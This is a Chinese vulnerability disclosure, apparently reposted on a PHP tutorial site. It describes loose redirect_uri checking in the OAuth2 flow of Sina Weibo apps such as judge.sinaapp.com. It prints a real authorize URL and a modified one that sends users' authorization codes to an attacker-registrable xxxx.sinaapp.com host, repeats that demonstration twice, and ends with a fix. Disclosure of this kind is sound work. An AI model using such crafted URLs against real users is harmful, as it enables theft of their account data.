新浪微博部分App Oauth2漏洞 – 网站安全 – 自学php

新浪微博很多应用有数量众多的用户，judge.sinaapp.com和qmatch.sinaapp.com等都是微博中用户量较大的应用，现在仍然存在Oauth2的漏洞，可造成用户隐私泄露等问题。

以judge.sinaapp.com为例

新浪授权页面

https://api.weibo.com/oauth2/authorize?client_id=2988081241&redirect_uri=http://judge.sinaapp.com/callback?next=http://judge.sinaapp.com&response_type=code&forcelogin=true&scope=follow_app_official_microblog

可以将该页面judge进行替换，例如

https://api.weibo.com/oauth2/authorize?client_id=2988081241&redirect_uri=http://xxxx.sinaapp.com/callback?next=http://judge.sinaapp.com&response_type=code&forcelogin=true&scope=follow_app_official_microblog

最终用户的认证信息就会发送到恶意用户的xxxx.sinaapp.com，xxxx.sinaapp.com可由任意用户注册，qmatch.sinaapp.com与此类似,此外还有大量微博应用存在这个问题。

以judge.sinaapp.com为例

新浪授权页面

https://api.weibo.com/oauth2/authorize?client_id=2988081241&redirect_uri=http://judge.sinaapp.com/callback?next=http://judge.sinaapp.com&response_type=code&forcelogin=true&scope=follow_app_official_microblog

可以将该页面judge进行替换，例如

https://api.weibo.com/oauth2/authorize?client_id=2988081241&redirect_uri=http://xxxx.sinaapp.com/callback?next=http://judge.sinaapp.com&response_type=code&forcelogin=true&scope=follow_app_official_microblog

终用户的认证信息就会发送到恶意用户的xxxx.sinaapp.com，qmatch.sinaapp.com与此类似，此外还有大量应用存在此问题。

修复方案：

严格认证redirect_uri